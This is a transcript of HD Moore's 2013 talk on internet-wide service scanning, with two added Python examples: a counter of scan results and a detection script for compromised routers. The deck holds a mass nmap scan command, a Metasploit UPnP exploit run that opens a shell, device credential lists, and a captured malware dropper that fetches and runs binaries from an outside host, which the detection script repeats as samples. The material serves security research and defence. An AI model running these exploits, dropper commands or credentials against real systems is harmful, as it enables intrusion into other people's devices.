
AusCert 2013: Global Network Security

Video of this presentation can be found at:
https://www.youtube.com/watch?v=ZNlikR11icY

This presentation focused on the results of a 12-month research project that involved scanning the internet at large for a number of common services. The original intent of the project was to identify cases where vendors or ISPs have put large groups of consumers at risk due to negligent practices. These results have been obtained and continue to be collected and analyzed. In addition to the consumer-level issues, quite a few major exposures have been identified during the analysis of the data set. So far, this analysis has helped four other independent research teams quantify their results and resulted in Bloomberg/NYT coverage due to its use in identifying the FinFisher botnet C&C systems (a government-run malware environment). This data is immensely useful for quantifying exposure, identifying new global-scale threats, and creating indicators of future compromise.

HD Moore

May 23, 2013

Transcript

  6. # nmap -sS -PS443 -p443 -n --max-retries=1 -n -M 256 \
    --open \
    --min-rtt-timeout=1000ms --max-rtt-timeout=1000ms \
    --min-hostgroup=50000 --min-rate=50000 \
    --max-rate=50000 \
    --script=banner-plus.nse \
    --excludefile=exclude.txt \
    -oG node.gnmap -oX node.xml \
    -iR 250000
    Code: https://github.com/hdm/scan-tools
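
    As an added example (not code from the deck or from hdm/scan-tools), this Python script does the aggregation behind the "Unique IPs by Service" charts: it parses the grepable output the command above writes to node.gnmap and counts distinct addresses per open port, so a host that answers twice is counted once. The sample lines and addresses below are constructed.

```python
"""Aggregate distinct IPs per open port from nmap grepable (-oG) output."""
import re
from collections import defaultdict

# Constructed sample of what `-oG node.gnmap` emits; addresses are documentation ranges.
SAMPLE_GNMAP = """\
# Nmap 6.25 scan initiated Mon Mar  4 12:00:00 2013 as: nmap -sS -p443 --open -oG node.gnmap -iR 250000
Host: 192.0.2.10 ()\tPorts: 443/open/tcp//https///\tIgnored State: closed (0)
Host: 192.0.2.11 ()\tStatus: Up
Host: 192.0.2.11 ()\tPorts: 443/open/tcp//https///, 8080/open/tcp//http-proxy///
Host: 198.51.100.7 ()\tPorts: 23/open/tcp//telnet///, 80/filtered/tcp//http///
Host: 192.0.2.10 ()\tPorts: 443/open/tcp//https///
# Nmap done at Mon Mar  4 12:05:00 2013 -- 250000 IP addresses (3 hosts up) scanned in 300.00 seconds
"""

# Host line: "Host: <ip> (<hostname>)<TAB>Ports: <entries>[<TAB>Ignored State: ...]"
HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(.*?\)\s+Ports:\s+(.*?)(?:\t|$)")
# Port entry: port/state/protocol/owner/service/rpcinfo/version/
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)/[^/]*/([^/]*)/")

def parse_open_ports(gnmap_text):
    """Yield (ip, port, proto, service) for every port nmap reports as open."""
    for line in gnmap_text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # comment lines and Status-only lines carry no ports
        ip, ports_field = m.group(1), m.group(2)
        for port, state, proto, service in PORT_RE.findall(ports_field):
            if state == "open":
                yield ip, int(port), proto, service

def unique_ips_by_service(gnmap_text):
    """Return {port: distinct IP count}; a host listed twice is counted once."""
    seen = defaultdict(set)
    for ip, port, _proto, _service in parse_open_ports(gnmap_text):
        seen[port].add(ip)
    return {port: len(ips) for port, ips in sorted(seen.items())}

if __name__ == "__main__":
    for port, count in unique_ips_by_service(SAMPLE_GNMAP).items():
        print(f"{port:>6}  {count:,}")
```

    Filtered ports are deliberately dropped, since the charts count only services that actually answered.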

  7. Code: https://github.com/hdm/scan-tools

  10. "So what you're saying is I should just ignore the excessive amount of port
    snooping coming from your system(s), and I should allow this on your
    word alone? Since when did you become my big brother? Are you
    related to Obama?"

    "Ironically, since the days you have begun your independent
    scans we have received a few DDOS attacks using udp_app
    port 53 traffic.....any correlation?"

    "Please identify your customer operating
    from the above address at the time
    mentioned, and terminate immediately
    his hacking activities. Please prevent
    him from continuing his hacking
    activities in the future as well."

    "Due to the potential severity of this incident, we have
    reported it to the Computer Emergency Response
    Team (CERT) in United States (US) and Denmark."

    "You are welcome to try and hack my
    network as an academic exercise but
    even if you are successful you will find
    nothing of interest, and any attempt to
    corrupt the O/S can be restored in a few
    minutes."

  12. (chart) Unique IPs by Service, ports: 1900 80 161 137 443 8080 23 21 22 25 3306 110 143 995 993 5353 5900 17185; y-axis 0 to 140,000,000

  13. (charts) Global IPv4 Services and Australian IPv4 Services, same port list as slide 12

  14. (chart) Unique IPs by Service (same chart as slide 12)

  16. (chart) UPnP implementations: Intel/Portable SDK, MiniUPnP, Broadcom SDK, Others

  18. $ msfconsole
    msf > use exploit/multi/upnp/libupnp_ssdp_overflow
    msf exploit(libupnp_ssdp_overflow) > set RHOST 192.168.122.89
    msf exploit(libupnp_ssdp_overflow) > exploit
    [*] Started reverse double handler
    [*] Exploiting 192.168.122.89 with target Supermicro Onboard IPMI (X9SCL/X9SCM)
    [+] Sending payload of 178 bytes to 192.168.122.89:56911...
    [*] Accepted the first client connection...
    [*] Accepted the second client connection...
    [*] Command shell session 1 opened
    [*] Shutting down payload stager listener...
    uname -a
    Linux debian-armel 2.6.32-5-versatile #1 Wed Jan 12 23:05:11 UTC 2011 armv5tejl

  19. (chart) Unique IPs by Service (same chart as slide 12)

  20. (charts) Netcraft - January 2013: Apache, Microsoft, NginX. Critical.IO - January 2013: RomPager, Apache, Akamai, NginX, Microsoft

  21. (chart) Unique IPs by Service (same chart as slide 12)

  22. (chart) Devices by Country: USA ESP IND TUR BRA ITA DEU POL RUS THA VNM CHN PER MYS ARG EGY GBR TWN KOR IDN

  25. Usernames   Passwords
    admin       12345
    root        h3capadmin
    lyzdm       xialiang!@#
    lywlj       nhkhwlwhz
    lymr        admin
    lyjy        1234
    lyzwm       szwx@ah
    lyys        huawei
    jlllylj     itms123456
    lygsg       AAA888###
    lyjrw       662
    lyyys       abc123!
    lysw        zch3capadmin
    lygmb       123456
    lyfyh       apadmin
    huawei      password

  26. username=sa password=Masterkey2011 LicenseCheck=Defne
    DSN=sms;UID=XXX;PWD=XXXsys; DSN=GeoXXX;UID=XXX;PWD=XXXsys; 8383
    password h4ve@gr8d3y
    --daemon --port 8020 --socks5 --s_user Windows --s_password System
    XXXX /ssh /auth=password /user=admin /passwd=admin_p@s$word
    http://a.b.c/manage/retail_login.php3?ms_id=14320101&passwd=7325
    a.b.c.d:3389 --user administrator --pass passw0rd123

  28. (chart) Unique IPs by Service (same chart as slide 12)

  29. (chart) HUAWEI QUALCOMM ASUSTEK VMWARE HP DELL HYUNDAI MICROSOFT INTEL

  30. (chart) Unique IPs by Service (same chart as slide 12)

  31. (pie chart) FTP Software: ProFTPD, PureFTP, Microsoft, Firmware, vsFTPd, Mikrotik, FileZilla, Speedtouch, Other; slice labels 27%, 15%, 10%, 7%, 5%, 29%
    (pie chart) ProFTPD Versions: 1.3.3g, 1.3.1, 1.3.3a, 1.3.4a, 1.3.3e, 1.3.2e, 1.3.3c, 1.3.4b, 1.3.0, 1.3.3d, 1.3.2c, 1.2.10, 1.3.0a, 1.2.9, 1.3.5rc1, 1.3.2

  32. (chart) Unique IPs by Service (same chart as slide 12)

  33. (chart) SMTP, POP3, IMAP, POP3S, IMAPS

  34. (chart) Unique IPs by Service (same chart as slide 12)

  35. VNC Protocol Versions
    RFB 003.008
    RFB 003.889
    RFB 003.006
    RFB 003.003
    RFB 004.001
    RFB 004.000
    RFB 003.007
    RFB 003.004

  37. (chart) Unique IPs by Service (same chart as slide 12)

  39. (bar chart, y-axis 0 to 6000) OpenServer AIX Solaris UnixWare IRIX OpenVMS HPUX

  48. $ telnet A.B.C.D
    Escape character is '^]'.
    sh-3.00# history
    1 root
    2 admin
    3 mkdir /var/run; mkdir /var/run/.sysV6 && cd /var/run/.sysV6 &&
    wget -c http://176.xxx.xxx.xxx/sysV6/sysV6.sh && sh sysV6.sh ||
    mkdir /var/run/.sysV6 && cd /var/run/.sysV6 &&
    ftpget -u skynet -p cloud 176.xxx.xxx.xxx sysV6.sh sysV6/sysV6.sh &&
    sh sysV6.sh &

  49. # THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER.
    # UPLOAD GETBINARIES.SH IN YOUR HTTPD.
    # YOUR HTTPD SERVER:
    REFERENCE_HTTP="http://173.xxx.xxx.xxx"
    wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPSEL} -P /var/run …
    wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPS} -P /var/run && …
    wget -c ${REFERENCE_HTTP}/${REFERENCE_ARM} -P /var/run && …
    wget -c ${REFERENCE_HTTP}/${REFERENCE_PPC} -P /var/run && …
    wget -c ${REFERENCE_HTTP}/${REFERENCE_SUPERH} -P /var/run && …
    wget -c ${REFERENCE_HTTP}/sshd -P /var/run && …
    wget -c ${REFERENCE_HTTP}/telnetd -P /var/run && …
    iptables -A INPUT -p tcp --dport 23 -j DROP
    mv /usr/bin/wget /usr/bin/wg
    mv /bin/wget /bin /wg
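
    An added example, not part of the deck: a small Python triage check that turns the behaviours visible in the two slides above (a hidden staging directory under /var/run, a fetch from a raw address handed straight to sh, the telnet DROP rule, the renamed wget) into regex rules and runs them over a captured shell history. The rule names are mine and the sample history is constructed from the deck's redacted lines.

```python
"""Flag router shell-history lines matching the compromise pattern shown in the deck."""
import re

# Constructed sample: the deck's recovered history plus a few ordinary commands.
SAMPLE_HISTORY = [
    "root",
    "admin",
    "mkdir /var/run; mkdir /var/run/.sysV6 && cd /var/run/.sysV6 && "
    "wget -c http://176.xxx.xxx.xxx/sysV6/sysV6.sh && sh sysV6.sh",
    "ftpget -u skynet -p cloud 176.xxx.xxx.xxx sysV6.sh sysV6/sysV6.sh && sh sysV6.sh &",
    "iptables -A INPUT -p tcp --dport 23 -j DROP",
    "mv /usr/bin/wget /usr/bin/wg",
    "cat /proc/cpuinfo",
]

# Each rule is one behaviour visible on slides 48-49; redacted octets ("xxx") match too.
OCTET = r"(?:\d{1,3}|x{1,3})"
RULES = {
    "hidden_dir_in_run": re.compile(r"\b(?:mkdir|cd)\s+/var/run/\.[^\s/]+"),
    "fetch_then_exec":   re.compile(r"\b(?:wget|ftpget)\b.*&&\s*sh\s+\S+\.sh"),
    "fetch_from_raw_ip": re.compile(r"\b(?:wget|ftpget)\b.*?" + OCTET + r"(?:\." + OCTET + r"){3}"),
    "telnet_drop_rule":  re.compile(r"\biptables\b.*--dport\s+23\b.*-j\s+DROP\b"),
    "wget_renamed":      re.compile(r"\bmv\s+\S*/wget\s+\S*/wg\b"),
}

def scan_history(lines):
    """Return [(line_no, rule_name, command)], one entry per rule that fires on a line."""
    hits = []
    for line_no, cmd in enumerate(lines, 1):
        for name, rx in RULES.items():
            if rx.search(cmd):
                hits.append((line_no, name, cmd))
    return hits

def triage(lines):
    """Return (rules_fired, suspicious); two or more distinct rules firing is the signal."""
    fired = {name for _, name, _ in scan_history(lines)}
    return fired, len(fired) >= 2

if __name__ == "__main__":
    for line_no, name, cmd in scan_history(SAMPLE_HISTORY):
        print(f"line {line_no}: {name}: {cmd[:60]}")
    print("suspicious:", triage(SAMPLE_HISTORY)[1])
```

    Requiring two independent rules keeps a lone `iptables` or `mv` from raising an alert on its own; on the deck's history all five fire.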
